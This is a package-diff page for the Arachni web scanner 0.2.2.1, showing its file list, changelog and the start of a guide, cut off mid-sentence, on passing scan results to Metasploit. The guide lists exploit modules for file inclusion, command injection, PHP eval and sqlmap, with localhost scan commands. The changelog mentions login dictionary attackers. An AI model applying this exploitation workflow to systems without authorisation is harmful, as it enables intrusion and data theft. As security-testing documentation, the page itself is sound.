arachni 0.2.2.1
Sign up to get free protection for your applications and to get access to all the features.
- data/ACKNOWLEDGMENTS.md +14 -0
- data/AUTHORS.md +6 -0
- data/CHANGELOG.md +162 -0
- data/CONTRIBUTORS.md +10 -0
- data/EXPLOITATION.md +429 -0
- data/HACKING.md +101 -0
- data/LICENSE.md +341 -0
- data/README.md +350 -0
- data/Rakefile +86 -0
- data/bin/arachni +22 -0
- data/bin/arachni_web +77 -0
- data/bin/arachni_xmlrpc +21 -0
- data/bin/arachni_xmlrpcd +82 -0
- data/bin/arachni_xmlrpcd_monitor +74 -0
- data/conf/README.webui.yaml.txt +44 -0
- data/conf/webui.yaml +11 -0
- data/external/metasploit/LICENSE +24 -0
- data/external/metasploit/modules/exploits/unix/webapp/arachni_exec.rb +142 -0
- data/external/metasploit/modules/exploits/unix/webapp/arachni_path_traversal.rb +113 -0
- data/external/metasploit/modules/exploits/unix/webapp/arachni_php_eval.rb +150 -0
- data/external/metasploit/modules/exploits/unix/webapp/arachni_php_include.rb +141 -0
- data/external/metasploit/modules/exploits/unix/webapp/arachni_sqlmap.rb +92 -0
- data/external/metasploit/plugins/arachni.rb +536 -0
- data/getoptslong.rb +241 -0
- data/lib/anemone.rb +2 -0
- data/lib/anemone/cookie_store.rb +35 -0
- data/lib/anemone/core.rb +371 -0
- data/lib/anemone/exceptions.rb +5 -0
- data/lib/anemone/http.rb +144 -0
- data/lib/anemone/page.rb +337 -0
- data/lib/anemone/page_store.rb +160 -0
- data/lib/anemone/storage.rb +34 -0
- data/lib/anemone/storage/base.rb +75 -0
- data/lib/anemone/storage/exceptions.rb +15 -0
- data/lib/anemone/storage/mongodb.rb +89 -0
- data/lib/anemone/storage/pstore.rb +50 -0
- data/lib/anemone/storage/redis.rb +90 -0
- data/lib/anemone/storage/tokyo_cabinet.rb +57 -0
- data/lib/anemone/tentacle.rb +40 -0
- data/lib/arachni.rb +16 -0
- data/lib/audit_store.rb +346 -0
- data/lib/component_manager.rb +293 -0
- data/lib/component_options.rb +395 -0
- data/lib/exceptions.rb +76 -0
- data/lib/framework.rb +637 -0
- data/lib/http.rb +809 -0
- data/lib/issue.rb +302 -0
- data/lib/module.rb +4 -0
- data/lib/module/auditor.rb +455 -0
- data/lib/module/base.rb +188 -0
- data/lib/module/element_db.rb +158 -0
- data/lib/module/key_filler.rb +87 -0
- data/lib/module/manager.rb +87 -0
- data/lib/module/output.rb +68 -0
- data/lib/module/trainer.rb +240 -0
- data/lib/module/utilities.rb +110 -0
- data/lib/options.rb +547 -0
- data/lib/parser.rb +2 -0
- data/lib/parser/auditable.rb +522 -0
- data/lib/parser/elements.rb +296 -0
- data/lib/parser/page.rb +149 -0
- data/lib/parser/parser.rb +717 -0
- data/lib/plugin.rb +4 -0
- data/lib/plugin/base.rb +110 -0
- data/lib/plugin/manager.rb +162 -0
- data/lib/report.rb +4 -0
- data/lib/report/base.rb +119 -0
- data/lib/report/manager.rb +92 -0
- data/lib/rpc/xml/client/base.rb +71 -0
- data/lib/rpc/xml/client/dispatcher.rb +49 -0
- data/lib/rpc/xml/client/instance.rb +88 -0
- data/lib/rpc/xml/server/base.rb +90 -0
- data/lib/rpc/xml/server/dispatcher.rb +357 -0
- data/lib/rpc/xml/server/framework.rb +206 -0
- data/lib/rpc/xml/server/instance.rb +191 -0
- data/lib/rpc/xml/server/module/manager.rb +46 -0
- data/lib/rpc/xml/server/options.rb +124 -0
- data/lib/rpc/xml/server/output.rb +299 -0
- data/lib/rpc/xml/server/plugin/manager.rb +58 -0
- data/lib/ruby.rb +5 -0
- data/lib/ruby/object.rb +32 -0
- data/lib/ruby/string.rb +74 -0
- data/lib/ruby/xmlrpc/server.rb +27 -0
- data/lib/spider.rb +200 -0
- data/lib/typhoeus/request.rb +91 -0
- data/lib/typhoeus/response.rb +34 -0
- data/lib/ui/cli/cli.rb +744 -0
- data/lib/ui/cli/output.rb +279 -0
- data/lib/ui/web/log.rb +82 -0
- data/lib/ui/web/output_stream.rb +94 -0
- data/lib/ui/web/report_manager.rb +222 -0
- data/lib/ui/web/server.rb +903 -0
- data/lib/ui/web/server/db/placeholder +0 -0
- data/lib/ui/web/server/public/banner.png +0 -0
- data/lib/ui/web/server/public/bodybg-small.png +0 -0
- data/lib/ui/web/server/public/bodybg.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/pbar-ani.gif +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-bg_flat_0_aaaaaa_40x100.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-bg_flat_75_ffffff_40x100.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-bg_glass_55_fbf9ee_1x400.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-bg_glass_65_ffffff_1x400.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-bg_glass_75_dadada_1x400.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-bg_glass_75_e6e6e6_1x400.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-bg_glass_95_fef1ec_1x400.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-bg_highlight-soft_75_cccccc_1x100.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-icons_222222_256x240.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-icons_2e83ff_256x240.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-icons_454545_256x240.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-icons_888888_256x240.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/images/ui-icons_cd0a0a_256x240.png +0 -0
- data/lib/ui/web/server/public/css/smoothness/jquery-ui-1.8.9.custom.css +573 -0
- data/lib/ui/web/server/public/favicon.ico +0 -0
- data/lib/ui/web/server/public/footer.jpg +0 -0
- data/lib/ui/web/server/public/icons/error.png +0 -0
- data/lib/ui/web/server/public/icons/info.png +0 -0
- data/lib/ui/web/server/public/icons/ok.png +0 -0
- data/lib/ui/web/server/public/icons/status.png +0 -0
- data/lib/ui/web/server/public/js/jquery-1.4.4.min.js +167 -0
- data/lib/ui/web/server/public/js/jquery-ui-1.8.9.custom.min.js +781 -0
- data/lib/ui/web/server/public/logo.png +0 -0
- data/lib/ui/web/server/public/nav-left.jpg +0 -0
- data/lib/ui/web/server/public/nav-right.jpg +0 -0
- data/lib/ui/web/server/public/nav-selected-left.jpg +0 -0
- data/lib/ui/web/server/public/nav-selected-right.jpg +0 -0
- data/lib/ui/web/server/public/reports/placeholder +1 -0
- data/lib/ui/web/server/public/sidebar-bottom.jpg +0 -0
- data/lib/ui/web/server/public/sidebar-h4.jpg +0 -0
- data/lib/ui/web/server/public/sidebar-top.jpg +0 -0
- data/lib/ui/web/server/public/spider.png +0 -0
- data/lib/ui/web/server/public/style.css +604 -0
- data/lib/ui/web/server/tmp/placeholder +0 -0
- data/lib/ui/web/server/views/dispatcher.erb +85 -0
- data/lib/ui/web/server/views/dispatcher_error.erb +14 -0
- data/lib/ui/web/server/views/error.erb +1 -0
- data/lib/ui/web/server/views/flash.erb +18 -0
- data/lib/ui/web/server/views/home.erb +14 -0
- data/lib/ui/web/server/views/instance.erb +213 -0
- data/lib/ui/web/server/views/layout.erb +95 -0
- data/lib/ui/web/server/views/log.erb +40 -0
- data/lib/ui/web/server/views/modules.erb +71 -0
- data/lib/ui/web/server/views/options.erb +23 -0
- data/lib/ui/web/server/views/output_results.erb +51 -0
- data/lib/ui/web/server/views/plugins.erb +42 -0
- data/lib/ui/web/server/views/report_formats.erb +30 -0
- data/lib/ui/web/server/views/reports.erb +55 -0
- data/lib/ui/web/server/views/settings.erb +120 -0
- data/lib/ui/web/server/views/welcome.erb +38 -0
- data/lib/ui/xmlrpc/dispatcher_monitor.rb +204 -0
- data/lib/ui/xmlrpc/xmlrpc.rb +843 -0
- data/logs/placeholder +0 -0
- data/metamodules/autothrottle.rb +74 -0
- data/metamodules/timeout_notice.rb +118 -0
- data/metamodules/uniformity.rb +98 -0
- data/modules/audit/code_injection.rb +136 -0
- data/modules/audit/code_injection_timing.rb +115 -0
- data/modules/audit/code_injection_timing/payloads.txt +4 -0
- data/modules/audit/csrf.rb +301 -0
- data/modules/audit/ldapi.rb +103 -0
- data/modules/audit/ldapi/errors.txt +26 -0
- data/modules/audit/os_cmd_injection.rb +103 -0
- data/modules/audit/os_cmd_injection/payloads.txt +2 -0
- data/modules/audit/os_cmd_injection_timing.rb +104 -0
- data/modules/audit/os_cmd_injection_timing/payloads.txt +3 -0
- data/modules/audit/path_traversal.rb +141 -0
- data/modules/audit/response_splitting.rb +105 -0
- data/modules/audit/rfi.rb +193 -0
- data/modules/audit/sqli.rb +120 -0
- data/modules/audit/sqli/regexp_ids.txt +90 -0
- data/modules/audit/sqli_blind_rdiff.rb +321 -0
- data/modules/audit/sqli_blind_timing.rb +103 -0
- data/modules/audit/sqli_blind_timing/payloads.txt +51 -0
- data/modules/audit/trainer.rb +89 -0
- data/modules/audit/unvalidated_redirect.rb +90 -0
- data/modules/audit/xpath.rb +104 -0
- data/modules/audit/xpath/errors.txt +26 -0
- data/modules/audit/xss.rb +99 -0
- data/modules/audit/xss_event.rb +134 -0
- data/modules/audit/xss_path.rb +125 -0
- data/modules/audit/xss_script_tag.rb +112 -0
- data/modules/audit/xss_tag.rb +112 -0
- data/modules/audit/xss_uri.rb +125 -0
- data/modules/recon/allowed_methods.rb +104 -0
- data/modules/recon/backdoors.rb +131 -0
- data/modules/recon/backdoors/filenames.txt +16 -0
- data/modules/recon/backup_files.rb +177 -0
- data/modules/recon/backup_files/extensions.txt +28 -0
- data/modules/recon/common_directories.rb +138 -0
- data/modules/recon/common_directories/directories.txt +265 -0
- data/modules/recon/common_files.rb +138 -0
- data/modules/recon/common_files/filenames.txt +17 -0
- data/modules/recon/directory_listing.rb +171 -0
- data/modules/recon/grep/captcha.rb +62 -0
- data/modules/recon/grep/credit_card.rb +85 -0
- data/modules/recon/grep/cvs_svn_users.rb +73 -0
- data/modules/recon/grep/emails.rb +59 -0
- data/modules/recon/grep/html_objects.rb +53 -0
- data/modules/recon/grep/private_ip.rb +54 -0
- data/modules/recon/grep/ssn.rb +53 -0
- data/modules/recon/htaccess_limit.rb +82 -0
- data/modules/recon/http_put.rb +95 -0
- data/modules/recon/interesting_responses.rb +118 -0
- data/modules/recon/unencrypted_password_forms.rb +119 -0
- data/modules/recon/webdav.rb +126 -0
- data/modules/recon/xst.rb +107 -0
- data/path_extractors/anchors.rb +35 -0
- data/path_extractors/forms.rb +35 -0
- data/path_extractors/frames.rb +38 -0
- data/path_extractors/generic.rb +39 -0
- data/path_extractors/links.rb +35 -0
- data/path_extractors/meta_refresh.rb +39 -0
- data/path_extractors/scripts.rb +37 -0
- data/path_extractors/sitemap.rb +31 -0
- data/plugins/autologin.rb +137 -0
- data/plugins/content_types.rb +90 -0
- data/plugins/cookie_collector.rb +99 -0
- data/plugins/form_dicattack.rb +185 -0
- data/plugins/healthmap.rb +94 -0
- data/plugins/http_dicattack.rb +133 -0
- data/plugins/metamodules.rb +118 -0
- data/plugins/proxy.rb +248 -0
- data/plugins/proxy/server.rb +66 -0
- data/plugins/waf_detector.rb +184 -0
- data/profiles/comprehensive.afp +74 -0
- data/profiles/full.afp +75 -0
- data/reports/afr.rb +59 -0
- data/reports/ap.rb +55 -0
- data/reports/html.rb +179 -0
- data/reports/html/default.erb +967 -0
- data/reports/metareport.rb +139 -0
- data/reports/metareport/arachni_metareport.rb +174 -0
- data/reports/plugin_formatters/html/content_types.rb +82 -0
- data/reports/plugin_formatters/html/cookie_collector.rb +66 -0
- data/reports/plugin_formatters/html/form_dicattack.rb +54 -0
- data/reports/plugin_formatters/html/healthmap.rb +76 -0
- data/reports/plugin_formatters/html/http_dicattack.rb +54 -0
- data/reports/plugin_formatters/html/metaformatters/timeout_notice.rb +65 -0
- data/reports/plugin_formatters/html/metaformatters/uniformity.rb +71 -0
- data/reports/plugin_formatters/html/metamodules.rb +93 -0
- data/reports/plugin_formatters/html/waf_detector.rb +54 -0
- data/reports/plugin_formatters/stdout/content_types.rb +73 -0
- data/reports/plugin_formatters/stdout/cookie_collector.rb +61 -0
- data/reports/plugin_formatters/stdout/form_dicattack.rb +52 -0
- data/reports/plugin_formatters/stdout/healthmap.rb +72 -0
- data/reports/plugin_formatters/stdout/http_dicattack.rb +53 -0
- data/reports/plugin_formatters/stdout/metaformatters/timeout_notice.rb +55 -0
- data/reports/plugin_formatters/stdout/metaformatters/uniformity.rb +68 -0
- data/reports/plugin_formatters/stdout/metamodules.rb +89 -0
- data/reports/plugin_formatters/stdout/waf_detector.rb +48 -0
- data/reports/plugin_formatters/xml/content_types.rb +91 -0
- data/reports/plugin_formatters/xml/cookie_collector.rb +70 -0
- data/reports/plugin_formatters/xml/form_dicattack.rb +57 -0
- data/reports/plugin_formatters/xml/healthmap.rb +82 -0
- data/reports/plugin_formatters/xml/http_dicattack.rb +57 -0
- data/reports/plugin_formatters/xml/metaformatters/timeout_notice.rb +67 -0
- data/reports/plugin_formatters/xml/metaformatters/uniformity.rb +82 -0
- data/reports/plugin_formatters/xml/metamodules.rb +91 -0
- data/reports/plugin_formatters/xml/waf_detector.rb +58 -0
- data/reports/stdout.rb +182 -0
- data/reports/txt.rb +77 -0
- data/reports/xml.rb +231 -0
- data/reports/xml/buffer.rb +98 -0
- metadata +516 -0
data/ACKNOWLEDGMENTS.md
ADDED
@@ -0,0 +1,14 @@
|
|
1
|
+
# Acknowledgments
|
2
|
+
|
3
|
+
I’d like to thank:
|
4
|
+
|
5
|
+
- Mr. Miles Wolbe (owner of [TinyApps.Org](http://tinyapps.org/))
|
6
|
+
- Mr. Colin Davis (owner of [Lonava.com](http://lonava.com/))
|
7
|
+
- The good folks from [KATHO.be](http://www.katho.be/)
|
8
|
+
- Scott Buffington (owner of [BrutalDeluxe.us](http://brutaldeluxe.us/))
|
9
|
+
- The people who preferred to remain anonymous
|
10
|
+
|
11
|
+
for allowing me to test Arachni against their websites during the early stages of development.
|
12
|
+
|
13
|
+
All the people on [GitHub](http://github.com/Zapotek/arachni/issues)
|
14
|
+
that have submitted bugs and given constructive feedback.
|
data/AUTHORS.md
ADDED
data/CHANGELOG.md
ADDED
@@ -0,0 +1,162 @@
|
|
1
|
+
|
2
|
+
# ChangeLog
|
3
|
+
|
4
|
+
## Version 0.2.2.1 _(February 13, 2011)_
|
5
|
+
- Web UI v0.1-pre (Utilizing the Client - Dispatch-server XMLRPC architecture) (**New**)
|
6
|
+
- Basically a front-end to the XMLRPC client
|
7
|
+
- Support for parallel scans
|
8
|
+
- Report management
|
9
|
+
- Can be used to monitor and control any running Dispatcher
|
10
|
+
- Changed classification from "Vulnerabilities" to "Issues" (**New**)
|
11
|
+
- Improved detection of custom 404 pages.
|
12
|
+
- Reports updated to show plug-in results.
|
13
|
+
- Updated framework-wide cookie handling.
|
14
|
+
- Added parameter flipping functionality ( cheers to Nilesh Bhosale <nilesh at gslab.com >)
|
15
|
+
- Major performance optimizations (4x faster in most tests)
|
16
|
+
- All modules now use asynchronous requests and are optimized for highest traffic efficiency
|
17
|
+
- All index Arrays have been replaced by Sets to minimize look-up times
|
18
|
+
- Mark-up parsing has been reduced dramatically
|
19
|
+
- File I/O blocking in modules has been eliminated
|
20
|
+
- Crawler
|
21
|
+
- Improved performance
|
22
|
+
- Added '--spider-first" option (**New**)
|
23
|
+
- Substituted the XMLRPC server with an XMLRPC dispatch server (**New**)
|
24
|
+
- Multiple clients
|
25
|
+
- Parallel scans
|
26
|
+
- Extensive logging
|
27
|
+
- SSL cert based client authentication
|
28
|
+
- Added modules (**New**)
|
29
|
+
- Audit
|
30
|
+
- XSS in event attributes of HTML elements
|
31
|
+
- XSS in HTML tags
|
32
|
+
- XSS in HTML 'script' tags
|
33
|
+
- Blind SQL injection using timing attacks
|
34
|
+
- Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
|
35
|
+
- Blind OS command injection using timing attacks (*nix, Windows)
|
36
|
+
- Recon
|
37
|
+
- Common backdoors -- Looks for common shell names
|
38
|
+
- .htaccess LIMIT misconfiguration
|
39
|
+
- Interesting responses -- Listens to all traffic and logs interesting server messages
|
40
|
+
- HTML object grepper
|
41
|
+
- E-mail address disclosure
|
42
|
+
- US Social Security Number disclosure
|
43
|
+
- Forceful directory listing
|
44
|
+
- Added plugins (**New**)
|
45
|
+
- Dictionary attacker for HTTP Auth
|
46
|
+
- Dictionary attacker for form based authentication
|
47
|
+
- Cookie collector -- Listens to all traffic and logs changes in cookies
|
48
|
+
- Healthmap -- Generates sitemap showing the health of each crawled/audited URL
|
49
|
+
- Content-types -- Logs content-types of server responses aiding in the identification of interesting (possibly leaked) files
|
50
|
+
- WAF (Web Application Firewall) Detector
|
51
|
+
- MetaModules -- Loads and runs high-level meta-analysis modules pre/mid/post-scan
|
52
|
+
- AutoThrottle -- Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization
|
53
|
+
- TimeoutNotice -- Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with.</br>
|
54
|
+
It also points out the danger of DoS attacks against pages that perform heavy-duty processing.
|
55
|
+
- Uniformity -- Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization.
|
56
|
+
|
57
|
+
- New behavior on Ctrl+C
|
58
|
+
- The system continues to run in the background instead of pausing
|
59
|
+
- The user is presented with an auto-refreshing report and progress stats
|
60
|
+
- Updated module API
|
61
|
+
- Timing/delay attacks have been abstracted and simplified via helper methods
|
62
|
+
- The modules are given access to vector skipping decisions
|
63
|
+
- Simplified issue logging
|
64
|
+
- Added the option of substring matching instead of regexp matching in order to improve performance.
|
65
|
+
- Substituted regular expression matching with substring matching wherever possible.
|
66
|
+
- Reports:
|
67
|
+
- Added plug-in formatter components allowing plug-ins to have a say in how their results are presented (**New**)
|
68
|
+
- New HTML report (Cheers to [Christos Chiotis](mailto:chris@survivetheinternet.com) for designing the new HTML report template.) (**New**)
|
69
|
+
- Updated reports to include Plug-in results:
|
70
|
+
- XML report
|
71
|
+
- Stdout report
|
72
|
+
- Text report
|
73
|
+
|
74
|
+
## Version 0.2.1 _(November 25, 2010)_
|
75
|
+
- Major performance improvements
|
76
|
+
- Major system refactoring and code clean-up
|
77
|
+
- Major module API refactoring providing even more flexibility regarding element auditing and manipulation
|
78
|
+
- Integration with the Metasploit Framework via: (**New**)
|
79
|
+
- ArachniMetareport, an Arachni report specifically designed to provide WebApp context to the [Metasploit](http://www.metasploit.com/) framework.
|
80
|
+
- Arachni plug-in for the [Metasploit](http://www.metasploit.com/) framework, used to load the ArachniMetareport in order to provide advanced automated and manual exploitation of WebApp vulnerabilities.
|
81
|
+
- Advanced generic WebApp exploit modules for the [Metasploit](http://www.metasploit.com/) framework, utilized either manually or automatically by the Arachni MSF plug-in.
|
82
|
+
- Improved Blind SQL Injection module, significantly less requests per audit.
|
83
|
+
- XMLRPC server (**New**)
|
84
|
+
- XMLRPC CLI client (**New**)
|
85
|
+
- NTLM authentication support (**New**)
|
86
|
+
- Support for path extractor modules for the Spider (**New**)
|
87
|
+
- Path extractors: (**New**)
|
88
|
+
- Generic -- extracts URLs from arbitrary text
|
89
|
+
- Anchors
|
90
|
+
- Form actions
|
91
|
+
- Frame sources
|
92
|
+
- Links
|
93
|
+
- META refresh
|
94
|
+
- Script 'src' and script code
|
95
|
+
- Sitemap
|
96
|
+
- Plug-in support -- allowing the framework to be extended with virtually any functionality (**New**).
|
97
|
+
- Added plug-ins: (**New**)
|
98
|
+
- Passive proxy
|
99
|
+
- Automated login
|
100
|
+
- Added modules: (**New**)
|
101
|
+
- Audit
|
102
|
+
- XPath injection
|
103
|
+
- LDAP injection
|
104
|
+
- Recon
|
105
|
+
- CVS/SVN user disclosure
|
106
|
+
- Private IP address disclosure
|
107
|
+
- Robot file reader (in the Common Files module)
|
108
|
+
- XST
|
109
|
+
- WebDAV detection
|
110
|
+
- Allowed HTTP methods
|
111
|
+
- Credit card number disclosure
|
112
|
+
- HTTP PUT support
|
113
|
+
- Extended proxy support (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0). (**New**)
|
114
|
+
|
115
|
+
|
116
|
+
## Version 0.2 _(October 14, 2010)_
|
117
|
+
|
118
|
+
- Improved output.
|
119
|
+
- Increased context awareness.
|
120
|
+
- Extensive debugging output capabilities.
|
121
|
+
- Added simple stats at the end of scans.
|
122
|
+
- Rewritten HTTP interface.
|
123
|
+
- High-performance asynchronous HTTP requests.
|
124
|
+
- Adjustable HTTP request concurrency limit.
|
125
|
+
- Adjustable HTTP response harvests.
|
126
|
+
- Custom 404 page detection.
|
127
|
+
- Optimized Trainer subsystem.
|
128
|
+
- Invoked when it is most likely to detect new vectors.
|
129
|
+
- Can be invoked by individual modules on-demand,
|
130
|
+
forcing Arachni to learn from the HTTP responses they will cause -- a great asset to Fuzzers.
|
131
|
+
- Refactored and improved Auditor.
|
132
|
+
- No redundant requests, except when required by modules.
|
133
|
+
- Better parameter handling.
|
134
|
+
- Speed optimizations.
|
135
|
+
- Added differential analysis to determine whether a vulnerability needs manual verification.
|
136
|
+
- Refactored and improved module API.
|
137
|
+
- Major API clean up.
|
138
|
+
- With facilities providing more control and power over the audit process.
|
139
|
+
- Significantly increased ease of development.
|
140
|
+
- Modules have total flexibility and control over input combinations,
|
141
|
+
injection values and their formating -- if they need to.
|
142
|
+
- Modules can opt for sync or async HTTP requests (Default: async)
|
143
|
+
- Improved interrupt handling
|
144
|
+
- Scans can be paused/resumed at any time.
|
145
|
+
- In the event of a system exit or user cancellation reports will still be created
|
146
|
+
using whatever data were gathered during runtime.
|
147
|
+
- When the scan is paused the user will be presented with the results gathered thus far.
|
148
|
+
- Improved configuration profile handling
|
149
|
+
- Added pre-configured profiles
|
150
|
+
- Multiple profiles can be loaded at once
|
151
|
+
- Ability to show running profiles as CLI arguments
|
152
|
+
- Overall module improvements and optimizations.
|
153
|
+
- New modules for:
|
154
|
+
- Blind SQL Injection, using reverse-diff analysis.
|
155
|
+
- Trainer, probes all inputs of a given page, in order to uncover new input vectors, and forces Arachni to learn from the responses.
|
156
|
+
- Unvalidated redirects.
|
157
|
+
- Forms that transmit passwords in clear text.
|
158
|
+
- CSRF, implementing 4-pass rDiff analysis to drastically reduce noise.
|
159
|
+
- Overall report improvements and optimizations.
|
160
|
+
- New reports
|
161
|
+
- Plain text report
|
162
|
+
- XML report
|
data/CONTRIBUTORS.md
ADDED
@@ -0,0 +1,10 @@
|
|
1
|
+
# Contributors
|
2
|
+
|
3
|
+
These are the people that helped improve Arachni either by submitting code, suggestions or testing it.
|
4
|
+
|
5
|
+
- [Matías Aereal Aeón](http://mfsec.com.ar/), **Arachni's official tester**.
|
6
|
+
- [Christos Chiotis](mailto:chris@survivetheinternet.com) for designing the new HTML report template.
|
7
|
+
- [Steve Pinkham](http://github.com/spinkham) for beta testing and patches.
|
8
|
+
- [Aung Khant](mailto:aungkhant@yehg.net) for general suggestions.
|
9
|
+
|
10
|
+
A big thanks to my buddy [Andreas](mailto:rainmakergr@gmail.com) for the original spider drawing used in the project graphics.
|
data/EXPLOITATION.md
ADDED
@@ -0,0 +1,429 @@
|
|
1
|
+
# WebApp exploitation with Arachni and Metasploit
|
2
|
+
|
3
|
+
Arachni provides advanced exploitation techniques via the:
|
4
|
+
|
5
|
+
- ArachniMetareport, an Arachni report specifically designed to provide WebApp context to the [Metasploit](http://www.metasploit.com/) framework.
|
6
|
+
- Arachni plug-in for the [Metasploit](http://www.metasploit.com/) framework, used to load the ArachniMetareport in order to provide advanced automated and manual exploitation of WebApp vulnerabilities.
|
7
|
+
- Advanced generic WebApp exploit modules for the [Metasploit](http://www.metasploit.com/) framework, utilized either manually or automatically by the Arachni MSF plug-in.
|
8
|
+
|
9
|
+
|
10
|
+
##Installation
|
11
|
+
|
12
|
+
To install the necessary files all you need to do is copy the contents of the "external/metasploit" directory to Metasploit's root.
|
13
|
+
$ cp -R arachni/external/metasploit/* metasploit/
|
14
|
+
|
15
|
+
##Usage
|
16
|
+
|
17
|
+
###Creating the Metareport
|
18
|
+
|
19
|
+
#### New scan
|
20
|
+
$ ./arachni.rb http://localhost/~zapotek/tests/ --report=metareport:outfile=localhost.afr.msf
|
21
|
+
Arachni - Web Application Security Scanner Framework v0.2.1 [0.1.9]
|
22
|
+
Author: Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>
|
23
|
+
<zapotek@segfault.gr>
|
24
|
+
(With the support of the community and the Arachni Team.)
|
25
|
+
|
26
|
+
Website: http://github.com/Zapotek/arachni
|
27
|
+
Documentation: http://github.com/Zapotek/arachni/wiki
|
28
|
+
|
29
|
+
|
30
|
+
[~] No modules were specified.
|
31
|
+
[~] -> Will run all mods.
|
32
|
+
[~] No audit options were specified.
|
33
|
+
[~] -> Will audit links, forms and cookies.
|
34
|
+
|
35
|
+
[...snipping a whole lot of scan output...]
|
36
|
+
|
37
|
+
[*] Creating file for the Metasploit framework...
|
38
|
+
[*] Saved in 'localhost.afr.msf'.
|
39
|
+
|
40
|
+
[*] Dumping audit results in 'metareport.afr'.
|
41
|
+
[*] Done!
|
42
|
+
|
43
|
+
#### Converting an existing report
|
44
|
+
To convert a standard Arachni Framework Report (.afr) file to a Metareport (.afr.msf) file:
|
45
|
+
|
46
|
+
$ ./arachni.rb --repload=localhost.afr --report=metareport:outfile=localhost.afr.msf
|
47
|
+
Arachni - Web Application Security Scanner Framework v0.2.1 [0.1.9]
|
48
|
+
Author: Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>
|
49
|
+
<zapotek@segfault.gr>
|
50
|
+
(With the support of the community and the Arachni Team.)
|
51
|
+
|
52
|
+
Website: http://github.com/Zapotek/arachni
|
53
|
+
Documentation: http://github.com/Zapotek/arachni/wiki
|
54
|
+
|
55
|
+
|
56
|
+
|
57
|
+
[*] Creating file for the Metasploit framework...
|
58
|
+
[*] Saved in 'localhost.afr.msf'.
|
59
|
+
|
60
|
+
|
61
|
+
### Using the Arachni plug-in via Metasploit
|
62
|
+
|
63
|
+
#### Loading the ArachniMetareport
|
64
|
+
$ ./msfconsole # Start the MSF
|
65
|
+
|
66
|
+
888 888 d8b888
|
67
|
+
888 888 Y8P888
|
68
|
+
888 888 888
|
69
|
+
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
|
70
|
+
888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
|
71
|
+
888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
|
72
|
+
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
|
73
|
+
888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
|
74
|
+
888
|
75
|
+
888
|
76
|
+
888
|
77
|
+
|
78
|
+
|
79
|
+
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
|
80
|
+
+ -- --=[ 620 exploits - 307 auxiliary
|
81
|
+
+ -- --=[ 215 payloads - 27 encoders - 8 nops
|
82
|
+
=[ svn r10844 updated today (2010.10.29)
|
83
|
+
|
84
|
+
msf > load arachni # Load the Arachni plug-in
|
85
|
+
[*] Successfully loaded plugin: arachni
|
86
|
+
msf > arachni_load ../arachni/localhost.afr.msf # Load the ArachniMetareport using the Arachni plug-in
|
87
|
+
[*] Loading report...
|
88
|
+
[*] Loaded 19 vulnerabilities.
|
89
|
+
|
90
|
+
|
91
|
+
Unique exploits
|
92
|
+
===============
|
93
|
+
|
94
|
+
ID Exploit Description
|
95
|
+
-- ------- -----------
|
96
|
+
1 unix/webapp/arachni_php_include
|
97
|
+
This module allows complex HTTP requests to be crafted in order to
|
98
|
+
allow exploitation of PHP remote file inclusion vulnerabilities.
|
99
|
+
|
100
|
+
Use 'XXinjectionXX' to mark the value of the vulnerable variable/field,
|
101
|
+
i.e. where the payload should go.
|
102
|
+
|
103
|
+
Supported vectors: GET, POST, COOKIE, HEADER.
|
104
|
+
(Mainly for use with the Arachni plug-in.)
|
105
|
+
|
106
|
+
2 unix/webapp/arachni_exec
|
107
|
+
This module allows complex HTTP requests to be crafted in order to
|
108
|
+
allow exploitation of command injection vulnerabilities in Unix-like platforms.
|
109
|
+
|
110
|
+
Use 'XXinjectionXX' to mark the value of the vulnerable variable/field,
|
111
|
+
i.e. where the payload should go.
|
112
|
+
|
113
|
+
Supported vectors: GET, POST, COOKIE, HEADER.
|
114
|
+
(Mainly for use with the Arachni plug-in.)
|
115
|
+
|
116
|
+
3 unix/webapp/arachni_php_eval
|
117
|
+
This module allows complex HTTP requests to be crafted in order to
|
118
|
+
allow exploitation of PHP eval() vulnerabilities in Unix-like platforms.
|
119
|
+
|
120
|
+
Use 'XXinjectionXX' to mark the value of the vulnerable variable/field,
|
121
|
+
i.e. where the payload should go.
|
122
|
+
|
123
|
+
Supported vectors: GET, POST, COOKIE, HEADER.
|
124
|
+
(Mainly for use with the Arachni plug-in.)
|
125
|
+
|
126
|
+
4 unix/webapp/arachni_sqlmap
|
127
|
+
|
128
|
+
This module is designed to be used with the Arachni plug-in.
|
129
|
+
|
130
|
+
From the original:
|
131
|
+
|
132
|
+
This module launches an sqlmap session.
|
133
|
+
sqlmap is an automatic SQL injection tool developed in Python.
|
134
|
+
Its goal is to detect and take advantage of SQL injection
|
135
|
+
vulnerabilities on web applications. Once it detects one
|
136
|
+
or more SQL injections on the target host, the user can
|
137
|
+
choose among a variety of options to perform an extensive
|
138
|
+
back-end database management system fingerprint, retrieve
|
139
|
+
DBMS session user and database, enumerate users, password
|
140
|
+
hashes, privileges, databases, dump entire or user
|
141
|
+
